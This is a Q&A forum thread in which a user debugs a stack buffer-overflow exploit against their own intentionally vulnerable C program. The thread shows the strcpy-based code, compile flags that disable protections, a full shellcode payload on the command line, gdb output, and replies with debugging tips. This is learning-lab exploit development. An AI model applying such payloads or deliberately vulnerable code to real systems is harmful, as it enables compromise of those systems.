# Illegal Instruction on sample Buffer Overflow exploit

Tags: linux, exploit, shellcode

I have followed the example [here](https://www.exploit-db.com/papers/24085/).

Here is my sample program, "oldskool.c":

```
#include <string.h>
void go(char *data) {
    char name[64];

    strcpy(name, data);
}

int main (int argc, char **argv) {
    go(argv[1]);
}
```

I have compiled this program using:

```
gcc oldskool.c -o oldskool -zexecstack -fno-stack-protector -g
```

I have also switched ASLR off.

Using gdb's x/gx $rsp, I verified that passing in an argument of `perl -e 'print "A"x80'` will overwrite the SIP exactly. Here is the output of p &name

```
$1 = (char (*)[64]) 0x7fffffffddc0
```

I then took the example shellcode, and adding the padding and the SIP, came up with this:

```
./oldskool `perl -e 'print "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff\xc7\x5e\x48\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd9\xff\xff\xff\x48\x61\x78\x21" . "A"x27 . "\xc0\xdd\xff\xff\xff\x7f"'`
```

When I run this, however, I get an "Illegal Instruction" error. Here's what gdb will tell me:

```
Starting program: /path/to/oldskool `perl -e 'print "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff\xc7\x5e\x48\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd9\xff\xff\xff\x48\x61\x78\x21" . "A"x27 . "\xc0\xdd\xff\xff\xff\x7f"'`

Program received signal SIGILL, Illegal instruction.
0x00007fffffffddc0 in ?? ()

(gdb) x/10i 0x7fffffffddc0
=> 0x7fffffffddc0:  (bad)  
   0x7fffffffddc1:  (bad)  
   0x7fffffffddc2:  (bad)  
   0x7fffffffddc3:  incl   (%rax)
   0x7fffffffddc5:  add    %al,(%rax)
   0x7fffffffddc7:  add    %ah,-0x1e(%rcx)
   0x7fffffffddcd:  jg     0x7fffffffddcf
   0x7fffffffddcf:  add    %ch,%bl
   0x7fffffffddd1:  and    0x31(%rax),%cl
   0x7fffffffddd4:  rorb   $0xff,0x31(%rax)
```

Does anyone have any clue as to what is causing this error?

Comment: It would help to examine the values at the disassembled locations.  That way, you'll know if your shellcode is anywhere nearby.  The solution might then be obvious.

Comment: Is your shellcode stack aligned?  You might be corrupting your stack.  Is everything the right endianness?  Backwards instructions would be bad.

Comment: @peter, Which locations, specifically, would you recommend providing disassembly information for?

Comment: @raz, everything is the right endianness, but I'm not sure what you mean by stack-aligned.

Comment: If your shellcode happens to not land on the 4 byte boundary then you'd be corrupting the stack in a way that would yield an illegal instruction

Comment: @raz, how would I adjust my perl instruction to make sure I'm landing on the 4-byte boundary? Please note, the article I attached does not mention this

Answer (score 1):

Your shellcode is invalid. Change it to \x90\x90\x90\x90\x90\x90\xcc to check and detect the correct. [image]

Comment: Are you saying to replace the example shellcode with yours, add padding and address to it, and run it?

Comment: Well replace the c0ddffffff7f with 9090909090cc